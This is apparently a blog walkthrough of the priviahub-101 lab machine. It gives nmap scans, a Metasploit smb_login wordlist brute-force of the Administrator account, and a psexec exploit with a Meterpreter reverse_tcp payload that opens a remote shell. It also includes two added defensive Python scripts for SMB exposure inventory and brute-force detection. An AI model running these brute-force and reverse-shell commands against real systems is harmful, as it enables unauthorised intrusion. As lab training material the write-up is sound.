PriviaHub Walkthrough : priviahub-101

Emre Alkaya
4 min read · Oct 22, 2020

Welcome to my first article on Medium. Today we will be looking at priviahub-101 from PriviaHub. I chose this machine specifically because it is a good starting point for people who want to become penetration testers.

Summary:

  • There are two important open ports on the machine: 139 and 445.
  • SMB runs on port 139 (NetBIOS) and on port 445.
  • Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
  • Port 445: Later versions of SMB (after Windows 2000) began to use port 445 directly on top of a TCP stack. Using TCP allows SMB to work over the internet.
  • The task asks us to brute-force the Administrator account through the SMB service with the rockyou.txt wordlist, then exploit the machine using the Metasploit psexec module and capture the flags.
  • Basic Windows privilege escalation with the shell command.

Let’s start with this machine.

The “priviahub-101” machine IP is 172.16.71.175

We are going to apply the usual penetration testing methodology, as we have before. Let’s start with enumeration, to learn as much about the machine as possible.

Enumeration

We are going to start with an nmap scan to gather more information about the services and versions running on this machine.

nmap -T4 -A -p- 172.16.71.175
nmap scan

As we can see, ports 139 and 445 are open. If you are wondering what that means: it shows the SMB service is exposed. Server Message Block (SMB) is an application layer (layer 7) protocol that is widely used for file, port, named pipe and printer sharing. It is a client-server communication protocol. Let’s run a focused nmap scan against that port:

nmap -A -p 445 172.16.71.175
nmap 445 scan
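The two scans above tell us which hosts expose SMB, but reading that off screenshots does not scale past one machine. The script below is an added example (it is not part of the original walkthrough): it parses nmap’s grepable output (what you get with `-oG`) and reports which hosts have 139 and/or 445 open, which is the same question a defender asks when inventorying SMB exposure on a network. The scan text is constructed; only the address 172.16.71.175 comes from the article, the host 10.0.0.5 is a placeholder, and the version strings are sample values, not the real scan result.

```python
"""Inventory SMB exposure from nmap grepable (-oG) output.

Added example, not from the walkthrough. SAMPLE_SCAN is constructed:
172.16.71.175 is the article's target, 10.0.0.5 is a placeholder host
and the version strings are sample values.
"""
from __future__ import annotations

from dataclasses import dataclass

SMB_PORTS = {139, 445}

# Constructed sample. nmap -oG writes one "Status:" line and one "Ports:" line
# per host; fields are tab-separated and each port entry is
# port/state/proto/owner/service/rpc/version/ separated by ", ".
SAMPLE_SCAN = """\
# Nmap scan initiated as: nmap -T4 -A -p- -oG scan.gnmap 172.16.71.175
Host: 172.16.71.175 ()\tStatus: Up
Host: 172.16.71.175 ()\tPorts: 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 445/open/tcp//microsoft-ds//Microsoft Windows microsoft-ds/\tIgnored State: filtered (65533)
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 80/open/tcp//http//nginx 1.18.0/, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (65533)
# Nmap done
"""


@dataclass(frozen=True)
class PortInfo:
    port: int
    state: str
    service: str
    version: str


def parse_grepable(text: str) -> dict[str, list[PortInfo]]:
    """Return {ip: [PortInfo, ...]} from nmap -oG text."""
    hosts: dict[str, list[PortInfo]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and blank lines
        fields = line.split("\t")
        ip = fields[0].split()[1]  # "Host: <ip> (<hostname>)"
        hosts.setdefault(ip, [])
        ports_field = next((f for f in fields if f.startswith("Ports:")), None)
        if ports_field is None:
            continue  # the "Status: Up" line carries no ports
        for entry in ports_field[len("Ports:"):].strip().split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue  # malformed entry, skip rather than crash
            hosts[ip].append(PortInfo(int(parts[0]), parts[1], parts[4], parts[6]))
    return hosts


def smb_exposure(hosts: dict[str, list[PortInfo]]) -> dict[str, list[int]]:
    """Map each host to the SMB ports (139/445) it has in the open state.

    Filtered or closed SMB ports are deliberately not reported: only an
    open port is reachable by a client, which is what matters for exposure.
    """
    report: dict[str, list[int]] = {}
    for ip, ports in hosts.items():
        open_smb = sorted(p.port for p in ports
                          if p.port in SMB_PORTS and p.state == "open")
        if open_smb:
            report[ip] = open_smb
    return report


if __name__ == "__main__":
    for ip, ports in smb_exposure(parse_grepable(SAMPLE_SCAN)).items():
        print(f"{ip}: SMB open on {ports}")
```

Run with a real file by reading it into `parse_grepable` instead of `SAMPLE_SCAN`; the same output from `nmap -oG` on the whole subnet gives you the list of machines where an SMB brute-force like the one in the next section is even possible.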

SMB Brute-Force attack

We can use msfconsole to learn more about this machine’s users. In msfconsole, search for smb_login.

Then use the scanner module:

use auxiliary/scanner/smb/smb_login
show options
set RHOSTS 172.16.71.175
set SMBUser Administrator
set PASS_FILE /root/rockyou.txt
run

We used rockyou.txt to find the Administrator password.

If you are wondering where “Administrator” came from: it was given in the machine info.

We found the Administrator password.

msfconsole

Exploitation

We will use this information with the Metasploit psexec module.

User: “Administrator”, Password: “111111”

The last step is the psexec module.

In msfconsole, search for smb psexec.

Then use the exploit module:

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
show options
set RHOSTS 172.16.71.175
set SMBUser Administrator
set SMBPass 111111
set LHOST tun0
set LPORT 443
set target 2
exploit

We are inside the machine.

exploit
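From the blue-team side, the two steps just performed (a wordlist run against Administrator over SMB, then psexec dropping a service on the host) leave a recognisable trail in the Windows event log: a burst of failed network logons (event 4625, logon type 3) from one source against one account, a successful network logon (4624) from the same source, and shortly afterwards a service installation (System log event 7045) with a random-looking service name. The script below is an added example, not part of the walkthrough, that chains those three signals into one alert. The log lines are constructed in a simplified pipe-delimited shape rather than real Windows XML; the source address 10.0.0.99, the second host 10.0.0.7, the user alice, the service name and the timestamps are all placeholders.

```python
"""Detect an SMB password-guessing burst followed by a remote service install.

Added example, not from the walkthrough. SAMPLE_EVENTS is constructed and
uses the field order  timestamp|event_id|account|source_ip|logon_type|service
instead of real Windows event XML. 10.0.0.99, 10.0.0.7, alice, xzQkPwLb
and the timestamps are placeholders.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta

THRESHOLD = 5                         # failed logons from one source against one account
FAIL_WINDOW = timedelta(minutes=5)    # failures must fall within this window before success
SERVICE_WINDOW = timedelta(minutes=2) # service install must follow the success this closely

# Constructed sample. The first block mimics smb_login then psexec; the two
# alice lines are a benign single typo followed by a normal logon.
SAMPLE_EVENTS = """\
2020-10-22T09:55:10|4625|alice|10.0.0.7|3|
2020-10-22T09:55:20|4624|alice|10.0.0.7|3|
2020-10-22T10:00:01|4625|Administrator|10.0.0.99|3|
2020-10-22T10:00:01|4625|Administrator|10.0.0.99|3|
2020-10-22T10:00:02|4625|Administrator|10.0.0.99|3|
2020-10-22T10:00:02|4625|Administrator|10.0.0.99|3|
2020-10-22T10:00:03|4625|Administrator|10.0.0.99|3|
2020-10-22T10:00:05|4624|Administrator|10.0.0.99|3|
2020-10-22T10:00:07|7045|SYSTEM|-|-|xzQkPwLb
"""


def parse_events(text: str) -> list[dict]:
    """Parse the simplified pipe-delimited lines into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, account, src, ltype, svc = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "id": int(eid),
                       "account": account, "src": src,
                       "logon_type": ltype, "service": svc})
    return events


def detect_bruteforce_then_service(events: list[dict]) -> list[dict]:
    """Return one alert per successful network logon that was preceded by
    THRESHOLD or more failures from the same source within FAIL_WINDOW.

    Each alert also lists services installed within SERVICE_WINDOW after the
    success; an empty list still means the password guessing worked and
    deserves attention, the service just makes the psexec step explicit.
    """
    events = sorted(events, key=lambda e: e["ts"])
    failures: dict[tuple[str, str], list[datetime]] = defaultdict(list)
    service_installs = [e for e in events if e["id"] == 7045]
    alerts = []
    for e in events:
        key = (e["src"], e["account"])
        if e["id"] == 4625 and e["logon_type"] == "3":
            failures[key].append(e["ts"])
        elif e["id"] == 4624 and e["logon_type"] == "3":
            recent = [t for t in failures[key] if e["ts"] - t <= FAIL_WINDOW]
            if len(recent) < THRESHOLD:
                continue  # an ordinary mistyped password, not a burst
            services = [s["service"] for s in service_installs
                        if timedelta(0) <= s["ts"] - e["ts"] <= SERVICE_WINDOW]
            alerts.append({"src": e["src"], "account": e["account"],
                           "failed_attempts": len(recent),
                           "logon_at": e["ts"].isoformat(),
                           "services_installed": services})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce_then_service(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The thresholds are deliberately loose for a lab; on a real estate you would tune THRESHOLD per account type and feed the script from your SIEM’s 4625/4624/7045 export rather than a text file. Note also the attribution trick: 7045 carries no source address, so the link to the attacker is made through the preceding 4624 from the same source, not through the service event itself.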

Privilege Escalation

Then we can run sysinfo to learn about this machine’s system information.

We can use the shell command to get a Windows command prompt.

shell

We enumerate the file system to grab the user.txt and root.txt flags.

user flag

We found the user flag.

root flag

We found the root flag.

That was our last step here: getting the root flag.

Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!
